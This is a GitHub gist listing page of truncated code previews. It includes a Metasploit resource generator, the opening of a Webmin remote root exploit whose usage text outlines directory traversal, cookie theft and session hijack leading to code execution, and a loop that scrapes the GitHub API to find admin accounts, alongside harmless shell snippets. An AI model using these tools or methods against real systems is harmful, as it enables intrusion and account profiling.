Skip to content

Instantly share code, notes, and snippets.

View oxagast's full-sized avatar
🔨
Probably breaking your code.

Mark Stealer Whitehall oxagast

🔨
Probably breaking your code.
69 followers · 61 following
View GitHub Profile
@oxagast
oxagast / autopreter.pl
Last active November 24, 2020 17:18
Automatically generate a custom metasploit.rc resource targeted at an address.
#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ( $path !~ m/metasploit/ ) {
print("err: Your current working directory must be metasploit's.\n");
exit(1);
}
print("autopreter by oxagast\n");
if ( $#ARGV < 1 ) {
@oxagast
oxagast / makeitrain.sh
Last active July 31, 2022 23:35
#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
# __ _ _ __ ___ __ ____ ____
# / ( \/ )/ _\ / __)/ _\/ ___(_ )
# ( O ) (/ ( (_ / \___ \ )(
# \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed
@YaaSSDD
YaaSSDD / wmsploit-remote-root-1.29-reprise.sh
Created February 22, 2020 22:45 — forked from oxagast/wmsploit-remote-root-1.29-reprise.sh
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
@johnnypea
johnnypea / useful-one-liners.sh
Last active April 22, 2024 14:56
Useful one liners
# Run the last command as root
sudo !!
# Serve current directory tree at http://$HOSTNAME:8000/
python -m SimpleHTTPServer
# Save a file you edited in vim without the needed permissions
:w !sudo tee %
# change to the previous working directory
cd -
# Runs previous command but replacing
^foo^bar
@oxagast
oxagast / qg.c
Last active February 24, 2023 07:10
Shortest working C quine, works on a nuance of compilers and linkers.
/* touch qg.c && gcc qg.c -o gg.o -c && ld gg.o -o quine 2>/dev/null && ./quine | cat */
@oxagast
oxagast / github_admin_enumerator.sh
Created February 28, 2021 05:57
for i in {1..10000};
do
curl "https://api.github.com/users/KevinHock/following?per_page=100&page=${i}" -s | tee -a github.ids; # KevinHock follows everyone
sleep 300; # sleep 5 min between pages or rate limit kicks in soon
done;
cat github.ids | grep true -B 18 -A 1 | grep login | cut -d '"' -f 4 | xargs -I {LOGIN} curl "https://api.github.com/users
/{LOGIN}" -s | sed -e 's/}/},/' > github_admins.txt
cat github_admins.txt;
@oxagast
oxagast / cache_rebuild.sh
Last active December 8, 2021 01:25
Dissassembles all binaries in a directory and sorts by most used processor instructions
# finds and sorts most commonly used processor instructions from raw objdump dissassembley.
objdump -D /bin/bash | grep -E " .{6,}:" | grep -v '(bad)' | cut -d ':' -f 2 | sort -b -t, -nk2 | uniq -c | sort -n -r | grep -E "\s+[[:digit:]]+\s+.{12,}$" | head -n 15
@m0rb
m0rb / pbash64.sh
Last active May 5, 2023 05:01
pure bash bash64.sh
#!/bin/bash
B=({A..Z} {a..z} {0..9});p=printf\ ;I=$(B=$@
for((;i<${#B};i++)){ for y in {31..128};{
[[ ${B:i:1} = "$($p\\x`$p%x $y`)" ]]&&(a()((q=y/2,r=y%2));a;o=$r
for((;q;)){ y=$q;a;o=$r$o;};$p%08d $o)} })
for((;e<${#I};e+=6)){ y=${I:e:6}0000;O+=${B[2#${y::6}]};}
for((;${#O}%4;)){ O+=\=;}
$p$O